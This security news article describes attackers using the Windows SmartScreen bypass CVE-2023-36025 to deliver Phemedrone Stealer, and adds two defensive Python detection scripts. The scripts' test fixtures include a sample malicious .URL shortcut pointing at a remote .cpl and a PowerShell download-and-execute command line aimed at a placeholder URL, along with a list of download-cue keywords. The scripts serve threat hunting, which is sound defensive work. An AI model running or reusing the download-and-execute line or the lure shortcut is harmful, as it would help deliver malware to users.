Threat actors have been observed leveraging a now-patched security flaw in Microsoft Windows to deploy an open-source information stealer called Phemedrone Stealer.
"Phemedrone targets web browsers and data from cryptocurrency wallets and messaging apps such as Telegram, Steam, and Discord," Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said.
"It also takes screenshots and gathers system information regarding hardware, location, and operating system details. The stolen data is then sent to the attackers via Telegram or their command-and-control (C&C) server."
The attacks leverage CVE-2023-36025 (CVSS score: 8.8), a security feature bypass vulnerability in Windows SmartScreen that could be exploited by tricking a user into clicking a specially crafted Internet Shortcut (.URL) file, or a hyperlink pointing to one, so that the target is opened without the usual SmartScreen warning.
The actively-exploited shortcoming was addressed by Microsoft as part of its November 2023 Patch Tuesday updates.
The infection process involves the threat actor hosting malicious Internet Shortcut files on Discord or cloud services like FileTransfer.io, with the links also masked using URL shorteners such as Short URL.
The execution of the booby-trapped .URL file allows it to connect to an actor-controlled server and execute a control panel (.CPL) file in a manner that circumvents Windows Defender SmartScreen by taking advantage of CVE-2023-36025.
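The lure described above is an ordinary INI-style Internet Shortcut whose URL= target points at a file on an attacker-controlled host rather than at a web page. The triage script below, an added example that is not Trend Micro's or the Phemedrone project's code, parses .URL files and flags targets that are remote (file:// URL or UNC path) and carry an extension Windows hands to a code-executing handler, .cpl among them. The sample shortcuts, the TEST-NET-3 host 203.0.113.5, the share and file names, and the extension list beyond .cpl are constructed assumptions; the check is a heuristic for hunting and mail-gateway triage, not a signature.

```python
"""Triage Internet Shortcut (.URL) files for a remote executable target.
Added example with constructed samples; heuristic, not a signature."""
import posixpath
import re
from urllib.parse import unquote, urlparse

# Extensions Windows hands to a code-executing handler when the target is
# opened. .cpl is the one the article describes; the rest are assumptions
# added for breadth.
EXEC_EXTENSIONS = {".cpl", ".exe", ".dll", ".scr", ".lnk", ".hta", ".js",
                   ".jse", ".vbs", ".vbe", ".wsf", ".bat", ".cmd", ".msi"}

LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}


def parse_url_file(text):
    """Parse the [InternetShortcut] section into a dict of lower-cased keys.
    Hand-rolled rather than configparser so odd or duplicated lines never raise."""
    fields = {}
    in_section = False
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields.setdefault(key.strip().lower(), value.strip())
    return fields


def _split_unc(path):
    """'\\\\host\\share\\x' or '//host/share/x' -> ('host', 'share/x')."""
    parts = re.split(r"[\\/]+", path.strip("\\/"), maxsplit=1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def split_file_target(target):
    """Return (host, path) for a file:// URL or UNC path, or None when the
    target is not a file reference at all (http, https, mailto, ...)."""
    t = unquote(target.strip())
    if t.startswith(("\\\\", "//")):
        return _split_unc(t)
    parsed = urlparse(t)
    if parsed.scheme.lower() != "file":
        return None
    if not parsed.netloc and parsed.path.startswith("//"):
        return _split_unc(parsed.path)          # file:////host/share/x form
    return parsed.netloc, parsed.path


def target_is_remote_executable(target):
    """(flagged, reason): flagged when the target is an executable on a remote host."""
    split = split_file_target(target)
    if split is None:
        return False, "not a file:// or UNC target"
    host, path = split
    if host.lower() in LOCAL_HOSTS:
        return False, "file target is local"
    ext = posixpath.splitext(path.replace("\\", "/"))[1].lower()
    if ext not in EXEC_EXTENSIONS:
        return False, "remote file but extension %s is not executable" % (ext or "(none)")
    return True, "remote %s target on host %s" % (ext, host)


def triage_url_file(text):
    """Triage the contents of one .URL file."""
    fields = parse_url_file(text)
    target = fields.get("url", "")
    if not target:
        return {"flagged": False, "target": None, "reason": "no URL= field"}
    flagged, reason = target_is_remote_executable(target)
    return {"flagged": flagged, "target": target, "reason": reason}


# Constructed samples: TEST-NET-3 address, invented share and file names.
MALICIOUS_SAMPLE = """[InternetShortcut]
URL=file://203.0.113.5/share/update.cpl
IconIndex=0
"""
BENIGN_SAMPLE = """[InternetShortcut]
URL=https://example.com/
"""

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, triage_url_file(sample))
```

Both the `file://host/...` and the `file:////host/...` spellings are handled, as is a bare UNC path, because all three reach the same remote share; a local `file:///C:/...` target is deliberately not flagged so the rule stays quiet on ordinary desktop shortcuts.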
"When the malicious .CPL file is executed through the Windows Control Panel process binary, it in turn calls rundll32.exe to execute the DLL," the researchers said. "This malicious DLL acts as a loader that then calls on Windows PowerShell to download and execute the next stage of the attack, hosted on GitHub."
The follow-on payload is a PowerShell loader ("DATA3.txt") that acts as a launchpad for Donut, an open-source shellcode loader that decrypts and executes Phemedrone Stealer.
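The chain quoted above leaves a distinctive process lineage on the endpoint: control.exe spawning rundll32.exe, which in turn spawns PowerShell with a download-and-execute command line. The script below, an added example and not Trend Micro's detection logic, walks Sysmon Event ID 1-style process-creation records and raises an alert for exactly that lineage, scoring it higher when the PowerShell command line carries a download cue or the Control Panel stage referenced a .cpl on a remote path. The event records, the host 203.0.113.5 and the GitHub raw URL are constructed stand-ins, not real indicators.

```python
"""Flag the control.exe -> rundll32.exe -> powershell.exe lineage over
Sysmon-style process-creation events. Added example with constructed data."""
import ntpath

# Constructed sample events (Sysmon Event ID 1 fields, trimmed). The host,
# share, and DATA3.txt URL are invented stand-ins, not real indicators.
EVENTS = [
    {"pid": 4120, "ppid": 3200, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Lure: the .URL target is a remote .cpl, which Windows hands to control.exe
    {"pid": 5001, "ppid": 4120, "image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" "\\203.0.113.5\share\update.cpl"'},
    {"pid": 5002, "ppid": 5001, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "\\203.0.113.5\share\update.cpl",'},
    {"pid": 5003, "ppid": 5002,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/example-org/example-repo/main/DATA3.txt')\""},
    # Benign: a user opens a local Control Panel applet by hand
    {"pid": 6001, "ppid": 4120, "image": r"C:\Windows\System32\control.exe",
     "cmdline": "control.exe ncpa.cpl"},
    {"pid": 6002, "ppid": 6001, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL ncpa.cpl,'},
    # Benign: interactive PowerShell launched from Explorer
    {"pid": 7001, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
EXPECTED_ANCESTORS = ["rundll32.exe", "control.exe"]      # nearest parent first
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "downloaddata", "net.webclient",
                 "invoke-webrequest", "iwr ", "invoke-restmethod", "irm ",
                 "start-bitstransfer", "curl ", "wget ")


def image_name(event):
    return ntpath.basename(event["image"]).lower()


def ancestry(by_pid, pid, depth=5):
    """Process names from pid upward, child first; stops at depth or at an unknown parent."""
    names = []
    while pid in by_pid and len(names) < depth:
        names.append(image_name(by_pid[pid]))
        pid = by_pid[pid]["ppid"]
    return names


def references_remote_cpl(cmdline):
    """True when a command line names a .cpl on a UNC path or file:// URL."""
    c = cmdline.lower()
    return ".cpl" in c and ("\\\\" in c or "file://" in c)


def detect(events):
    """Return one alert per PowerShell process whose lineage matches the chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if image_name(ev) not in POWERSHELL:
            continue
        lineage = ancestry(by_pid, ev["pid"])
        if lineage[1:3] != EXPECTED_ANCESTORS:
            continue
        cmd = ev["cmdline"].lower()
        cues = [c for c in DOWNLOAD_CUES if c in cmd]
        parent = by_pid[ev["ppid"]]
        grandparent = by_pid[parent["ppid"]]
        remote_cpl = (references_remote_cpl(parent["cmdline"])
                      or references_remote_cpl(grandparent["cmdline"]))
        alerts.append({
            "pid": ev["pid"],
            "lineage": " -> ".join(reversed(lineage[:3])),
            "download_cues": cues,
            "remote_cpl": remote_cpl,
            "severity": "high" if cues or remote_cpl else "medium",
            "cmdline": ev["cmdline"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The lineage match alone is rated medium because control.exe launching rundll32.exe is how every .cpl applet runs; PowerShell underneath it is the unusual part, and a download cue or a remote .cpl path in the parent's command line is what makes it worth paging on.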
Written in C#, Phemedrone Stealer is actively maintained by its developers on GitHub and Telegram, facilitating the theft of sensitive information from compromised systems.
The development is once again a sign that threat actors are getting increasingly flexible and quickly adapting their attack chains to capitalize on newly disclosed exploits and inflict maximum damage.
"Despite having been patched, threat actors continue to find ways to exploit CVE-2023-36025 and evade Windows Defender SmartScreen protections to infect users with a plethora of malware types, including ransomware and stealers like Phemedrone Stealer," the researchers said.